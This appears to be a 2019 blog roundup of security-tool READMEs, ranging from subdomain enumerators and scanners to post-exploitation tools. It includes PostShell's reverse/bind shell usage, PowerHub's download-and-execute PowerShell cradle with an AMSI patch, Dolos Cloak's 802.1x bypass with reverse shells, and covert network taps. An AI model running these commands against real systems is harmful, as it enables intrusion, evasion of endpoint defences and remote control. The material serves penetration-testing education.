Grabbers and Collectors

  • HTTP Server, X-Powered-By and Location headers.
  • HTTP and HTTPS robots.txt disallowed entries.
  • HTTPS certificates chain ( with recursive subdomain grabbing from CN and Alt Names ).
  • HTML title tag.
  • DNS version.bind. and hostname.bind. records.
  • MySQL, SMTP, FTP, SSH, POP and IRC banners.

Notes

Shodan API Key

The shodan.io API key parameter ( -shodan-key KEY ) is optional, however if not specified, no service fingerprinting will be performed and a lot less information will be shown (basically it just gonna be DNS subdomain enumeration).

ViewDNS API Key

If a ViewDNS API key parameter ( -viewdns-key KEY ) is passed, domain historical data will also be retrieved.

Anonymity and Legal Issues

The software will rely on your main DNS resolver in order to enumerate subdomains, also, several connections might be directly established from your host to the computers of the network you're scanning in order to grab banners from open ports. Technically, you're just connecting to public addresses with open ports (and there's no port scanning involved, as such information is grabbed indirectly using Shodan API), but you know, someone might not like such behaviour.

Building a Docker image

To build a Docker image with the latest version of XRay:

git clone https://github.com/evilsocket/xray.git
cd xray
docker build -t xraydocker .

Once built, XRay can be started within a Docker container using the following:

docker run --rm -it -p 8080:8080 xraydocker xray -address 0.0.0.0 -shodan-key shodan_key_here -domain example.com 

Manual Compilation

Make sure you are using Go >= 1.7, that your installation is working properly, that you have set the $GOPATH variable and you have appended $GOPATH/bin to your $PATH.

Then:

go get github.com/evilsocket/xray
cd $GOPATH/src/github.com/evilsocket/xray/
make

You'll find the executable in the build folder.

Usage

Usage: xray -shodan-key YOUR_SHODAN_API_KEY -domain TARGET_DOMAIN

Options:
  -address string
        IP address to bind the web ui server to. (default "127.0.0.1")
  -consumers int
        Number of concurrent consumers to use for subdomain enumeration. (default 16)
  -domain string
        Base domain to start enumeration from.
  -port int
        TCP port to bind the web ui server to. (default 8080)
  -preserve-domain
        Do not remove subdomain from the provided domain name.
  -session string
        Session file name. (default "<domain-name>-xray-session.json")
  -shodan-key string
        Shodan API key.
  -viewdns-key string
        ViewDNS API key.
  -wordlist string
        Wordlist file to use for enumeration. (default "wordlists/default.lst")

Example:

# xray -shodan-key yadayadayadapicaboo... -viewdns-key foobarsomethingsomething... -domain fbi.gov

____  ___
\   \/  /
 \     RAY v 1.0.0b
 /    by Simone 'evilsocket' Margaritelli
/___/\  \
      \_/

@ Saving session to fbi.gov-xray-session.json
@ Web UI running on http://127.0.0.1:8080/

Download XRay

Article link

Date of publish: Mon, 11 Nov 2019 09:53:00 +0000

Hacking for Dummies, 6th Edition ($29.99 Value) Free


"Hacking for Dummies, 6th Edition ($29.99 Value) Free for a Limited Time"

Stop hackers before they hack you!


In order to outsmart a would-be hacker, you need to get into the hacker’s mindset and with this book, thinking like a bad guy has never been easier. Get expert knowledge on penetration testing, vulnerability assessments, security best practices, and ethical hacking that is essential in order to stop a hacker in their tracks.

This no-nonsense book helps you learn how to recognize the vulnerabilities in your systems so you can safeguard them more diligently—with confidence and ease.
  • Get up to speed on Windows 10 hacks  
  • Learn about the latest mobile computing hacks
  • Get free testing tools   
  • Find out about new system updates and improvements
  • There’s no such thing as being too safe — and this resourceful guide helps ensure you’re protected.



Free offer expires 10/15/19

Offered Free by: Wiley

Article link

Date of publish: Mon, 14 Oct 2019 14:22:00 +0000

TraXSS - Automated XSS Vulnerability Scanner


  • Automated Vulnerability Scanner for XSS 
  • Written in Python3 


Traxss is an automated framework to scan URLs and webpages for XSS Vulnerabilities. It includes over 575 Payloads to test with and multiple options for robustness of tests.

Getting Started

Prerequisites
Traxss depends on Chromedriver. On MacOS this can be installed with the homebrew command:

brew install cask chromedriver

Alternatively, find a version for other operating systems here: https://sites.google.com/a/chromium.org/chromedriver/downloads

Installation

Run the command:

pip3 install -r requirements.txt

Running Traxss
Traxx can be started with the command:

python3 traxss.py

This will launch an interactive CLI to guide you through the process.

Types of Scans

Full Scan with HTML

Uses a query scan with 575+ payloads and attempts to find XSS vulnerabilities by passing parameters through the URL. It will also render the HTML and attempt to find manual XSS Vulnerablities (this feature is still in beta).

Full Scan w/o HTML

This scan will run the query scan only.

Fast Scan w/o HTML

This scan is the same as the full w/ HTML but it will only use 7 attack vectors rather than the 575+ vectors.

Fast Scan w/o HTML

This scan is the same as the fast w/o HTML but it will only use 7 attack vectors rather than the 575+ vectors.

Contributing

Thank you for your interest! All types of contributions are welcome.
  • Fork and clone this repository
  • Create your branch from the master branch
  • Please open your PR with the master branch as the base

Download TraXSS

Article link

Date of publish: Mon, 14 Oct 2019 08:28:00 +0000

Penta- Open Source All-in-one CLI To Automate Pentesting


Penta (PENTest + Automation tool) is Pentest automation tool using Python3.

Installation

Install requirements
penta requires the following packages.
  • Python3.7
  • pipenv

Resolve python package dependency.

$ pipenv install

If you dislike pipenv..

$ pip install -r requirements.txt

Usage

$ pipenv run start <options>

If you dislike pipenv...

$ python penta/penta.py

Usage: List options

$ pipenv run start -h

usage: penta.py [-h] [-target TARGET] [-ports PORTS] [-proxy PROXY]

Penta is Pentest automation tool.

optional arguments:
  •   -h, --help      show this help message and exit
  •   -target TARGET  Specify target IP / domain
  •   -ports PORTS    Please, specify the target port(s) separated by comma.
  •                   Default: 21,22,25,80,110,443,8080
  •   -proxy PROXY    Proxy[IP:PORT]

Usage: Main menu

[ ] === MENU LIST =================================
[0] EXIT
[1] Port scanning Default: 21,22,25,80,110,443,8080
[2] Nmap & vuln scanning
[3] Check HTTP option methods
[4] Grab DNS server info
[5] Shodan host search
[6] FTP connect with anonymous
[7] SSH connect with Brute Force
[99] Change target host

1. Port scanning
To check ports for a target. Log output supported.

2. Nmap
To check ports by additional means using nmap

3. Check HTTP option methods
To check the methods (e.g. GET,POST) for a target.

4. Grab DNS server info
To show the info about DNS server.

Shodan host search To collect host service info from Shodan.
Request Shodan API key to enable the feature.

FTP connect with anonymous To check if it has anonymous access activated in port 21. FTP users can authenticate themselves using the plain text sign-in protocol (Typically username and password format), but they can connect anonymously if the server is configured to allow it.

Anyone can log in to the server if the administrator has allowed an FTP connection with an anonymous login.

SSH connect with Brute Force To check ssh connection to scan with Brute Force. Dictionary data is in data/dict.

Download Now

Article link

Date of publish: Thu, 10 Oct 2019 18:57:00 +0000

Dolos Cloak- For Network Penetration Testers To Automated 802.1x Bypass


Dolos Cloak- Automated 802.1x Bypass


Dolos Cloak is a python script designed to help network penetration testers and red teamers bypass 802.1x solutions by using an advanced man-in-the-middle attack.

The script is able to piggyback on the wired connection of a victim device that is already allowed on the target network without kicking the victim device off the network. It was designed to run on an Odroid C2 running Kali ARM and requires two external USB ethernet dongles. It should be possible to run the script on other hardware and distros but it has only been tested on an Odroid C2 thus far.

How it Works

Dolos Cloak uses iptables, arptables, and ebtables NAT rules in order to spoof the MAC and IP addresses of a trusted network device and blend in with regular network traffic. On boot, the script disallows any outbound network traffic from leaving the Odroid in order to hide the MAC addresses of its network interfaces.

Next, the script creates a bridge interface and adds the two external USB ethernet dongles to the bridge. All traffic, including any 802.1x authentication steps, is passed on the bridge between these two interfaces.

In this state, the device is acting like a wire tap. Once the Odroid is plugged in between a trusted device (desktop, IP phone, printer, etc.) and the network, the script listens to the packets on the bridge interface in order to determine the MAC address and IP of the victim device.

Once the script determines the MAC address and IP of the victim device, it configures NAT rules in order to make all traffic on the OUTPUT and POSTROUTING chains look like it is coming from the victim device. At this point, the device is able to communicate with the network without being burned.

Once the Odroid is spoofing the MAC address and IP of the victim device, the script sends out a DHCP request in order to determine its default gateway, search domain, and name servers. It uses the response in order to configure its network settings so that the device can communicate with the rest of the network.

At this point, the Odroid is acting as a stealthy foothold on the network. Operators can connect to the Odroid over the built-in NIC eth0 in order to obtain network access. The device can also be configured to send out a reverse shell so that operators can utilize the device as a drop box and run commands on the network remotely.

For example, the script can be configured to run an Empire python stager after running the man-in-the-middle attack. You can then use the Empire C2 connection to upgrade to a TCP reverse shell or VPN tunnel.

Installation and Usage

  • Perform default install of Kali ARM on Odroid C2. 
ssh root@169.254.44.44
  • Be sure to save this project to /root/tools/dolos_cloak
  • Plug one external USB NIC into the Odroid and run dhclient to get internet access in order to install dependencies:
dhclient usbnet0
  • Run the install script to get all the dependencies and set the Odroid to perform the MitM on boot by default. Keep in mind that this will make drastic changes to the device's network settings and disable Network Manager. You may want to download any additional tools before this step:
cd setup
./setup.sh
  • You may want to install some other tools like 'host' that do not come standard on Kali ARM. Empire, enum4linux, and responder are also nice additions.
  • Make sure you are able to ssh into the Odroid via the built-in NIC eth0. Add your public key to /root/.ssh/authorized_keys for fast access.
  • Modify config.yaml to meet your needs. You should make sure the interfaces match the default names that your Odroid is giving your USB dongles. Order does not matter here. You should leave client_ip, client_mac, gateway_ip, and gateway_mac blank unless you used a LAN tap to mine them. The script should be able to figure this out for us. Set these options only if you know for sure their values. The management_int, domain_name, and dns_server options are placeholders for now but will be usefull very soon. For shells, you can set up a custom autorun command in the config.yaml to run when the man-in-middle attack has autoconfigured. You can also set up a cron job to send back shells.
  • Connect two usb ethernet dongles and reboot the device (you need two because the built-in ethernet won't support promiscuous mode)
  • Boot the device and wait a few seconds for autosniff.py to block the OUTPUT ethernet and IP chains. Then plug in the Odroid between a trusted device and the network.
  • PWN N00BZ, get $$$, have fun, hack the planet

Tips

  • Mod and run ./scripts/upgrade_to_vpn.sh to turn a stealthy Empire agent into a full blown VPN tunnel
  • Mod and run ./scripts/reverse_listener_setup.sh to set up a port for a reverse listener on the device.
  • Run ./scripts/responder_setup.sh to allow control of the protocols that we capture for responder. You shoud run responder on the bridge interface:
responder -I mibr
  • Be careful as some NAC solutions use port 445, 443, and 80 to periodically verify hosts. Working on a solution to this.
  • Logs help when the autosniff.py misbehaves. The rc.local is set to store the current session logs in ./logs/session.log and logs in ./logs/history.log so we can reboot and still check the last session's log if need be. Log files have cool stuff in them like network info, error messages, and all bash commands to set up the NAT ninja magic.

Download Dolos Cloak

Article link

Date of publish: Mon, 23 Sep 2019 07:54:00 +0000

PostShell - Post Exploitation Bind/Backconnect Shell


PostShell - Post Exploitation Bind/Backconnect Shell


PostShell is a post-exploitation shell that includes both a bind and a back connect shell. It creates a fully interactive TTY which allows for job control.

The stub size is around 14kb and can be compiled on any Unix like system. Banner and interaction with shell after a connection is started.

Why not use a traditional Backconnect/Bind Shell?

PostShell allows for easier post-exploitation by making the attacker less dependant on dependencies such as Python and Perl.

It also incorporates both a back connect and bind shell, meaning that if a target doesn't allow outgoing connections an operator can simply start a bind shell and connect to the machine remotely.

PostShell is also significantly less suspicious than a traditional shell due to the fact both the name of the processes and arguments are cloaked.

Features

  • Anti-Debugging, if ptrace is detected as being attached to the shell it will exit.
  • Process Name/Thread names are cloaked, a fake name overwrites all of the system arguments and file name to make it seem like a legitimate program.
  • TTY, a TTY is created which essentially allows for the same usage of the machine as if you were connected via SSH.
  • Bind/Backconnect shell, both a bind shell and back connect can be created.
  • Small Stub Size, a very small stub(<14kb) is usually generated.
  • Automatically Daemonizes
  • Tries to set GUID/UID to 0 (root)

Getting Started

  1. Downloading: git clone https://github.com/rek7/postshell
  2. Compiling: cd postshell && sh compile.sh This should create a binary called "stub" this is the malware.

Commands

$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$

Example Usage

Backconnect:

$ ./stub 127.0.0.1 13377

Bind Shell:

$ ./stub 13377

Receiving a Connection with Netcat


Recieving a backconnect:

$ nc -vlp port

Connecting to a bind Shell:

$ nc host port

TODO:

Add domain resolution

Download PostShell

Disclaimer: These scripts for knowledge purpose only

Article link

Date of publish: Tue, 10 Sep 2019 06:31:00 +0000

Findomain- Fastest And Cross-platform Subdomain Enumerator

FinDomain- Fastest And Cross-platform Subdomain Enumerator.


Comparison
It comparison gives you a idea why you should use findomain instead of another enumerators. The domain used for the test was Microsoft.com in the following BlackArch virtual machine:

Host: KVM/QEMU (Standard PC (i440FX + PIIX, 1996) pc-i440fx-3.1)
Kernel: 5.2.6-arch1-1-ARCH
CPU: Intel (Skylake, IBRS) (4) @ 2.904GHz
Memory: 139MiB / 3943MiB

Find-Domain used to calculate the time, is the time command in Linux.

You can see all the details of the tests in it link.


Enumeration ToolSearch TimeTotal Subdomains FoundCPU UsageRAM Usage
Findomainreal 0m38.701s5622Very LowVery Low
assetfinderreal 6m1.117s4630Very LowVery Low
Subl1st3rreal 7m14.996s996LowLow
Amass*real 29m20.301s332Very HighVery High

I can't wait to the amass test for finish, looks like it will never ends and additionally the resources usage is very high.

Note: The benchmark was made the 10/08/2019, since it point other software's can improve things and you will got different results.

Features

  • Discover sub-domains without brute-force, it uses Certificate Transparency Logs.
  • Discover sub-domains with or without IP address according to user arguments.
  • Read target from user argument (-t).
  • Read a list of targets from file and discover their sub-domains with or without IP and also write to output files per-domain if specified by the user, recursively.
  • Write output to TXT file.
  • Write output to CSV file.
  • Write output to JSON file.
  • Cross platform support: Any platform.
  • Optional multiple API support.
  • Proxy support.

Note: the proxy support is just to proxify APIs requests, the actual implementation to discover IP address of sub-domains doesn't support proxyfing and it's made using the host network still if you use the -p option.

How it works?

It tool doesn't use the common methods for sub(domains) discover, the tool uses Certificate Transparency logs to find sub-domains and it method make it tool the most faster and reliable. The tool make use of multiple public available APIs to perform the search. If you want to know more about Certificate Transparency logs, read https://www.certificate-transparency.org/

APIs that are using at the moment:
  • Certspotter: https://api.certspotter.com/
  • Crt.sh : https://crt.sh
  • Virustotal: https://www.virustotal.com/ui/domains/
  • Sublit3r: https://api.sublist3r.com/
  • Facebook: https://developers.facebook.com/docs/certificate-transparency

If you know other that should be added, open an issue.

Supported platforms in our binary releases

All supported platforms in the binarys that we give are 64 bits only and we don't have plans to add support for 32 bits binary releases, if you want to have support for 32 bits follow the documentation.
  • Linux
  • Windows
  • MacOS
  • ARM
  • Arch64 (Raspberry Pi)

Build for 32 bits or another platform

If you want to build the tool for your 32 bits system or another platform, follow it steps:

Note: You need to have rust, make and perl installed in your system first.

Using the Github source code:
  • Clone the repository or download the release source code.
  • Extract the release source code (only needed if you downloaded the compressed file).
  • Go to the folder where the source code is.
  • Execute cargo build --release
  • Now your binary is in target/release/findomain and you can use it.

Installation Android (Termux)

Install the Termux package, open it and follow it commands:

$ pkg install rust make perl
$ cargo install findomain
$ cd $HOME/.cargo/bin
$ ./findomain

Installation in Linux using source code

If you want to install it, you can do that manually compiling the source or using the precompiled binary.

Manually: You need to have rust, make and perl installed in your system first.

$ git clone https://github.com/Edu4rdSHL/findomain.git
$ cd findomain
$ cargo build --release
$ sudo cp target/release/findomain /usr/bin/
$ findomain

Installation in Linux using compiled artifacts

$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux
$ chmod +x findomain-linux
$ ./findomain-linux

If you are using the BlackArch Linux distribution, you just need to use:

$ sudo pacman -S findomain


Installation ARM

$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-arm
$ chmod +x findomain-arm
$ ./findomain-arm

Installation Aarch64 (Raspberry Pi)

$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-aarch64
$ chmod +x findomain-aarch64
$ ./findomain-aarch64

Installation Windows

Download the binary from 
https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-windows.exe

Open a CMD shell and go to the dir where findomain-windows.exe was downloaded.

Exec: findomain-windows in the CMD shell.

Installation MacOS

$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-osx
$ chmod +x findomain-osx.dms
$ ./findomain-osx.dms

Usage

You can use the tool in two ways, only discovering the domain name or discovering the domain + the IP address.

findomain 0.2.0
Eduard Tolosa <tolosaeduard@gmail.com>
A tool that use Certificates Transparency logs to find subdomains.

USAGE:
    findomain [FLAGS] [OPTIONS]

FLAGS:
    -a, --all-apis    Use all the available APIs to perform the search. It take more time but you will have a lot of
                      more results.
    -h, --help        Prints help information
    -i, --get-ip      Return the subdomain list with IP address if resolved.
    -V, --version     Prints version information

OPTIONS:
    -f, --file <file>        Sets the input file to use.
    -o, --output <output>    Write data to output file in the specified format. [possible values: txt, csv, json]
    -p, --proxy <proxy>      Use a proxy to make the requests to the APIs.
    -t, --target <target>    Target host


Examples

Make a simple search of subdomains and print the info in the screen:
findomain -t example.com

Make a simple search of subdomains using all the APIs and print the info in the screen:
findomain -t example.com -a

Make a search of subdomains and export the data to a CSV file:
findomain -t example.com -o csv

Make a search of subdomains using all the APIs and export the data to a CSV file:
findomain -t example.com -a -o csv

Make a search of subdomains and resolve the IP address of subdomains (if possible):
findomain -t example.com -i

Make a search of subdomains with all the APIs and resolve the IP address of subdomains (if possible):
findomain -t example.com -i -a

Make a search of subdomains with all the APIs and resolve the IP address of subdomains (if possible), exporting the data to a CSV file:
findomain -t example.com -i -a -o csv

Make a search of subdomains using a proxy (http://127.0.0.1:8080 in it case, the rest of aguments continue working in the same way, you just need to add the -p flag to the before commands):
findomain -t example.com -p http://127.0.0.1:8080

Download FinDomain

Article link

Date of publish: Sat, 24 Aug 2019 08:56:00 +0000

Burp Suite Extension - To Monitor And Keep Track of Tested Endpoints


Burp Scope Monitor Extension

A Burp Suite Extension to monitor and keep track of tested endpoints.


Main Features


  • Simple, easy way to keep track of unique endpoints when testing an application
  • Mark individual endpoints as analyzed or not
  • Instantly understand when a new endpoint, not tested is requested
  • Accessible from Proxy tab (right click, mark request as analyzed/not)
  • Send to Repeater
  • Enforcement of Burp's in scope rules
  • Import/Export state file directly to a CSV file for
  • Autosave option


Installation


  1. Make sure you have Jython configured under Extender -> Options -> Python Environment. For further instructions, check PortSwigger official instructions at their support page.
  2. git clone git@github.com:Regala/burp-scope-monitor.git
  3. Import main.py in Extender - Extender -> Extensions -> Add -> Select Python -> Select main.py


Documentation

Most of the options available in General or Import tabs are auto-explanatory.


  • "Repeater request automatically marks as analyzed" - when issuing a request to an endpoint from repeater, it marks this request as analyzed automatically.
  • "Color request in Proxy tab" - this essentially applies the behavior of the extension in the Proxy tab, if you combine these options with "Show only highlighted items" in Proxy. However, it's not as pleasant to the eyes as the color pallete is limited.
  • "Autosave periodically" - backups the state file every 10 minutes. When activating this option, consider disabling "Autostart Scope Monitor". This is in order to maintain a different state file per Burp project. However, you can easily maintain only one, master state file.
  • "Import/Export" is dedicated to handle the saved state files. It's preferred to open your Burp project file associated with the Scope Monitor. It will still work if the Burp project is different, but when loading the saved entries, you won't be able to send them to Repeater or view the request itself in the Request/Response viewer (this is due to the fact that we are not storing the actually requests - just the endpoint, it's analyzed status and a couple of other more. This makes it a little bit more efficient).

Future Development


  • Keep track of parameters observed in all requests
  • Highlight when a new parameter was used in an already observed/analyzed endpoint
  • Export to spreadsheet / Google Sheets
  • Adding notes to the endpoint

Implementation

The code is not yet performant, optimized or anything similar. KISS and it works. Performance will be increased depending on demand and how the extension performs when handling large Burp projects.

To circumvent some of Burp's Extender API limitations, some small hacks were implemented. One of those is automatically setting a comment on the requests that flow in the Proxy tab.

You can still add comments on the items, as you'd normally would, but just make sure to keep the placeholder string (scope-monitor-placeholder) there.

Hopefully in the future each requestResponse from Burp will have a unique identifier, which would make the import state / load from file much cleaner and fast. With large state files, this might hang a bit when loading.

Download Burp Scope Monitor 

Article link

Date of publish: Wed, 21 Aug 2019 11:45:00 +0000

Slurp- To Security Audits of S3 Buckets Enumerator


Slurp- Blackbox/Whitebox S3 Bucket Enumerator

To Evaluate the security of S3 buckets


Overview

  • Credit to all the vendor packages to develop Slurp possible.
  • Slurp is for pen-testers and security professionals to perform audits of s3 buckets.

Features

  • Scan via domain(s); you can target a single domain or a list of domains
  • Scan via keyword(s); you can target a single keyword or a list of keywords
  • Scan via AWS credentials; you can target your own AWS account to see which buckets have been exposed
  • Colorized output for visual grep
  • Currently generates over 28,000 permutations per domain and keyword (thanks to @jakewarren and @random-robbie)
  • Punycode support for internationalized domains
  • Strong copyleft license (GPLv3)

Modes

There are two modes that this tool operates at; blackbox and whitebox mode. Whitebox mode (or internal) is significantly faster than blackbox (external) mode.

Blackbox (external)

In this mode, you are using the permutations list to conduct scans. It will return false positives and there is no way to link the buckets to an actual aws account! Do not open issues asking how to do this.

Domain


Keywords


Whitebox (internal)

In this mode, you are using the AWS API with credentials on a specific account that you own to see what is open. This method pulls all S3 buckets and checks Policy/ACL permissions. Note that, I will not provide support on how to use the AWS API.

Your credentials should be in ~/.aws/credentials.

Internal



Usage

  • slurp domain <-t|--target> example.com will enumerate the S3 domains for a specific target.
  • slurp keyword <-t|--target> linux,golang,python will enumerate S3 buckets based on those 3 key words.
  • slurp internal performs an internal scan using the AWS API.

Installation

This project uses vgo; you can clone and go build or download from Releases section.

Please do not open issues on why you cannot build the project; this project builds like any other project would in Go, if you cannot build then I strongly suggest you read the go spec.

Also, the only binaries I'm including are linux/amd64; if you want mac/windows binaries, build it yourself.

Download Slurp

Article link

Date of publish: Wed, 07 Aug 2019 21:47:00 +0000

PowerHub- A Post Exploitation Suite To Bypass Endpoint Protection

PowerHub- A Post Exploitation Suite To Bypass Endpoint Protection


PowerHub is a convenient post exploitation tool which aids a pentester in transferring files, in particular code which may get flagged by endpoint protection.


During an engagement where you have a test client available, one of the first things you want to do is run PowerSploit. So you need to download the files, messing with endpoint protection, disable the execution policy, etc.

PowerHub provides an (almost) one-click-solution for this. Oh, and you can also run arbitrary binaries (PE and shell code) entirely in-memory using PowerSploit's modules, which is sometimes useful to bypass application whitelisting.

Your loot (Kerberos tickets, passwords, etc.) can be easily transferred back either as a file or a text snippet, via the command line or the web interface. PowerHub also helps with collaboration in case you're a small team.

On top of that, PowerHub comes with a reverse PowerShell, making it suitable for any kind of post-exploitation action.

Here is a simple example (grab information about local groups with PowerView and transfer it back):

PS C:\Users\avollmer> $K=new-object net.webclient;IEX $K.downloadstring('http://192.168.11.2:8000/0');
  _____   _____  _  _  _ _______  ______ _     _ _     _ ______
 |_____] |     | |  |  | |______ |_____/ |_____| |     | |_____]
 |       |_____| |__|__| |______ |    \_ |     | |_____| |_____]
                            written by Adrian Vollmer, 2018-2019
Run 'Help-PowerHub' for help
AmsiScanBuffer patch has been applied.
0
PS C:\Users\avollmer> lhm powerview
[*] /ps1/PowerSploit/Recon/PowerView.ps1 imported.
PS C:\Users\avollmer> Get-LocalGroup | pth -Name groups.json


Installation

PowerHub itself does not need to be installed. Just execute powerhub.py. However, there are a few dependencies. They are listed in the requirements.txt. Install them either via pip3 install --user -r requirements.txt or use a virtual environment:

Run python3 -m venv env to create a virtual environment, then use source env/bin/activate to activate it. Now run pip3 install -r requirements.txt to install the depencendies inside the virtual environment.

Python2 is not supported.

Usage

PowerHub has one mandatory argument: the callback host (can be an IP address). You should also use --auth <user>:<pass>, otherwise, a randomly generated password will be used for basic authentication.

The switch --no-auth disables basic authentication which is not recommended. The callback host name is used by the stager to download the payload. If the callback port or path differ from the default, it can also be changed.

Read ./powerhub.py --help and the Wiki for details.

Download PowerHub

Article link

Date of publish: Wed, 07 Aug 2019 21:15:00 +0000

Phantom Tap (PhanTap) - An ‘Invisible’ Network Tap


Phantom Tap (PhanTap) - An ‘Invisible’ Network Tap Aimed at Red Teams.



With limited physical access to a target building, this tap can be installed inline between a network device and the corporate network.


PhanTap is silent in the network and does not affect the victim’s traffic, even in networks having NAC (Network Access Control 802.1X - 2004). PhanTap will analyze traffic on the network and mask its traffic as the victim device.

It can mount a tunnel back to a remote server, giving the user a foothold in the network for further analysis and pivoting. PhanTap is an OpenWrt package and should be compatible with any device. The physical device used for our testing is currently a small, inexpensive router, the GL.iNet GL-AR150.

Features:

  • Transparent network bridge.
  • Silent : No ARP, multicast, broadcast.
  • 802.1x passthrough.
  • Automatic configuration:
Capture traffic exiting the network (the destination is non RFC1918), source IP and MAC is our victim, destination MAC is our gateway,
SNAT bridge traffic to the victim MAC and IP address,
set the router default gateway to the MAC of the gateway detected just before.

  • Introspects ARP, multicast and broadcast traffic and adds a route to the machine IP address and adds the machine MAC address to the neighbor list, hence giving the possibility of talking to all the machines in the local network.
  • Learns the DNS server from traffic and modifies the one on the router so that it's the same.
  • Can run commands (ex: /etc/init.d/openvpn restart) when a new IP or DNS is configured.
  • Lets you choose any VPN software, for example OpenVPN tcp port 443 so it goes through most firewalls.
  • You can talk to the victim machine (using the gateway IP).

Setup

PhanTap has been tested with the GL.iNet GL-AR150. This device has two separate network interfaces in OpenWrt (eth0, eth1).

If your device is using an internal switch (swconfig based) with interfaces like eth0.1, eth0.2, some special traffic might be blocked, e.g. 802.1Q (tagged vlan), but PhanTap should work.
  • Install a snapshot build, for the GL.iNet GL-AR150
  • Update the OpenWrt package list
opkg update
  • Install PhanTap package:
opkg install phantap phantap-learn
  • Configure the Wifi and start administering the router through it.
  • Either reboot the device, or run /etc/init.d/phantap setup.
  • Get the interface names from that device:
# uci show network | grep ifname
network.loopback.ifname='lo'
network.lan.ifname='eth1'
network.wan.ifname='eth0'
network.wan6.ifname='eth0'

In this example we are using a GL-AR150, which only has 2 interfaces.

Add the interfaces to the phantap bridge via the following commands in the cli (assuming we are using a GL-AR150):
  • uci delete network.lan.ifname
  • uci delete network.wan.ifname
  • uci delete network.wan6.ifname
  • uci set network.phantap.ifname='eth0 eth1'
  • uci commit network
  • /etc/init.d/network reload

Phantap is now configured, as soon as you plug it between a victim and their switch, it will automatically configure the router and give it Internet access.

You can add your favorite VPN to have a remote connection back. Tested PhanTap with Vpn, port TCP 443, to avoid some detection methods.

You can also add a command to be ran when a new IP or DNS is configured, in /etc/config/phantap, e.g. /etc/init.d/openvpn restart (restart VPN service).

You can also look at disabling the wifi by default and using hardware buttons to start it (https://openwrt.org/docs/guide-user/hardware/hardware.button).

Limitations or how it can be detected :

  • The GL.iNet GL-AR150 and most inexpensive devices only support 100Mbps, meanwhile modern network traffic will be 1Gbps.
  • The network port will stay up, switch side, when the victim device is disconnected/shutdown.
  • There is no re-configuration of PhanTap, so we might use an IP that has been reattributed to another device (roadmap DHCP).
  • Some traffic is blocked by the Linux bridge (STP/Pause frames/LACP).

Roadmap :

  • Add logic to restart the detection when the links go up/down.
  • Add DHCP packet analysis for dynamic reconfiguration.
  • Add IPv6 support.
  • Test limitations of devices that have switches(swconfig) instead of separate interfaces.

Article link

Date of publish: Wed, 07 Aug 2019 20:47:00 +0000

CloudCheck- To Test String If A Cloudflare DNS Bypass is Possible


CloudCheck- To Test String If A Cloudflare DNS Bypass is Possible 


Cloudcheck is made to be used in the same folder as CloudFail. Make sure all files in this repo are in the same folder before using.

CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by Cloudflare in the hopes of discovering the location of the server.

Using Tor to mask all requests, the tool as of right now has 3 different attack phases.
  • Misconfigured DNS scan using DNSDumpster.com.
  • Scan the Crimeflare.com database.
  • Bruteforce scan over 2500 subdomains.

Cloudcheck create a empty text file called none.txt in the data folder, that way it doesn't do a subdomain brute when testing.

Cloudcheck will automatically change your hosts file, using entries from CloudFail and test for a specified string to detect if said entry can be used to bypass Cloudflare.

If output comes out to be "True", you can use the IP address to bypass Cloudflare in your hosts file. (Later automating this process)

Download Cloudcheck

Article link

Date of publish: Fri, 02 Aug 2019 17:03:00 +0000

The Ultimate WinRM Shell For Penetration Testing


This shell is the ultimate WinRM shell for hacking/pentesting.


WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. 


A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system adminsitrators.

This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase.

The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.

Features

  • Command History
  • WinRM command completion
  • Local files completion
  • Upload and download files
  • List remote machine services
  • FullLanguage Powershell language mode
  • Load Powershell scripts
  • Load in memory dll files bypassing some AVs
  • Load in memory C# (C Sharp) compiled exe files bypassing some AVs
  • Colorization on output messages (can be disabled optionally)

Help

Usage: 
evil-winrm -i IP -u USER -s SCRIPTS_PATH -e EXES_PATH [-P PORT] [-p PASS] [-U URL]

  • -i, --ip IP                Remote host IP or hostname (required)
  • -P, --port PORT                Remote host port (default 5985)
  • -u, --user USER                 Username (required)
  • -p, --password PASS       Password
  • -s, --scripts PS_SCRIPTS_PATH    Powershell scripts path (required)
  • -e, --executables EXES_PATH        C# executables path (required)
  • -U, --url URL                    Remote url endpoint (default /wsman)
  • -V, --version                    Show version
  • -h, --help                           Display this help message


Requirements

Ruby 2.3 or higher is needed. Some ruby gems are needed as well: winrm >=2.3.2, winrm-fs >=1.3.2, stringio >=0.0.2 and colorize >=0.8.1.

~$ sudo gem install winrm winrm-fs colorize stringio

Installation 

Step 1. Clone the repo: 

git clone https://github.com/Hackplayers/evil-winrm.git

Step 2. Ready. Just launch it!

 ~$ cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

If you don't want to put the password in clear text, you can optionally avoid to set -p argument and the password will be prompted preventing to be shown.

To use IPv6, the address must be added to /etc/hosts.

Alternative installation method as ruby gem

Step 1. Install it: 

gem install evil-winrm

Step 2. Ready. Just launch it!

~$ evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'


Documentation

Basic commands

  • upload: local files can be auto-completed using tab key. It is not needed to put a remote_path if the local file is in the same directory as evil-winrm.rb file.
  • usage: upload local_path remote_path
  • download: it is not needed to set local_path if the remote file is in the current directory.
  • usage: download remote_path local_path
  • services: list all services. No administrator permissions needed.
  • menu: load the Invoke-Binary and l04d3r-LoadDll functions that we will explain below. When a ps1 is loaded all its functions will be shown up.

Load powershell scripts

To load a ps1 file you just have to type the name (auto-completion usnig tab allowed). The scripts must be in the path set at -s argument. Type menu again and see the loaded functions.


Advanced commands

